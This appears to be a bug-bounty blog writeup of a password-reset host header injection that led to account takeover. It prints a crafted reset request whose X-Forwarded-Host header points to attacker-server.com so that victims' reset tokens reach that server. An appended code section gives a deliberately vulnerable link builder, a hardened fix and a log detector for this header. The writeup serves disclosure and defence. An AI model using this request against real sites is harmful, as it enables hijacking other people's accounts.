How I Found an Account Takeover via a "Host Header Injection Bypass"

skysenz.medium.com · Skysenz · 10 days ago · research
Skysenz · ~1 min read · March 24, 2026 (Updated: March 24, 2026)

Summary

I found a flaw in the target's "Forgot Password" feature. Basically, I could trick the server into sending the password reset link to my own domain instead of their real one. The result: I could get hold of the token needed to change another user's password.

Step-by-Step

1. Check the target

While idly testing the forgot password feature, I intercepted the request with Burp Suite.

2. Dig into the headers

I saw a POST /api/password-reset request. Here I tried adding or modifying the X-Forwarded-Host header.

Original request:

```http
Host: target.com
```

Modified request (the X-Forwarded-Host line is the addition):

```http
POST /api/password-reset HTTP/1.1
Host: target.com
X-Forwarded-Host: attacker-server.com
...

{"email": "[email protected]"}
```

3. Look at the result

It turned out the server was really "naive": it built the password reset link using the value from that X-Forwarded-Host header.

4. The takeover

The victim receives an official-looking email from target.com, but the "Reset Password" button points to https://attacker-server.com/reset?token=xyz123

5. Get the token

When the victim clicks that link, the token ends up in my server's log. Grab the token, use it on the real target.com link, and change the victim's password. Boom, account taken over.

Impact

In my opinion this is high severity, hehehe. An attacker only needs the victim's email address to get into their account, without knowing the old password.

That's all for this writeup, see you in the next one!!! byeeee!

#cybersecurity #bug-bounty
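The fix for the bug described above is that the reset link's host must come from server-side configuration, never from Host or X-Forwarded-Host, and that the request's Host should be checked against an allowlist. The following is an added example, not the target's code: it puts the naive link builder from the writeup beside a hardened one, and adds a small detection pass over constructed log lines. The host names and the endpoint path are the writeup's; the log format and the allowlist are assumptions made here.

```python
from urllib.parse import urlencode

# Configured server-side; the link host must never come from the request.
CANONICAL_HOST = "target.com"                          # host from the writeup
TRUSTED_HOSTS = {"target.com", "www.target.com"}       # assumed allowlist
RESET_PATH = "/api/password-reset"                     # endpoint from the writeup


def vulnerable_reset_link(headers: dict, token: str) -> str:
    """The behaviour the writeup describes: the reset link's host is taken
    from X-Forwarded-Host (or Host) straight out of the request."""
    host = headers.get("X-Forwarded-Host") or headers.get("Host")
    return f"https://{host}/reset?{urlencode({'token': token})}"


def host_is_trusted(headers: dict) -> bool:
    """Check the Host header against the allowlist (port stripped).
    X-Forwarded-Host is deliberately not consulted."""
    host = headers.get("Host", "").split(":")[0].strip().lower()
    return host in TRUSTED_HOSTS


def safe_reset_link(headers: dict, token: str) -> str:
    """Hardened builder: refuse unexpected Host values and always emit the
    configured canonical host, whatever the request claimed."""
    if not host_is_trusted(headers):
        raise ValueError("unexpected Host header; refusing to build reset link")
    return f"https://{CANONICAL_HOST}/reset?{urlencode({'token': token})}"


def suspicious_reset_requests(log_lines) -> list:
    """Detection: return foreign X-Forwarded-Host values seen on reset
    requests. Log format is constructed for this example:
    '<method> <path> host=<Host> xfh=<X-Forwarded-Host or ->'."""
    hits = []
    for line in log_lines:
        _method, path, *fields = line.split()
        kv = dict(f.split("=", 1) for f in fields)
        xfh = kv.get("xfh", "-")
        if path == RESET_PATH and xfh != "-" and xfh.lower() not in TRUSTED_HOSTS:
            hits.append(xfh)
    return hits


# Constructed sample traffic mirroring the writeup's request.
SAMPLE_LOG = [
    "POST /api/password-reset host=target.com xfh=-",
    "POST /api/password-reset host=target.com xfh=attacker-server.com",
    "GET /login host=target.com xfh=www.target.com",
]
```

With the writeup's headers, `vulnerable_reset_link` yields a link on attacker-server.com while `safe_reset_link` yields one on target.com, and `suspicious_reset_requests(SAMPLE_LOG)` flags only the forwarded foreign host.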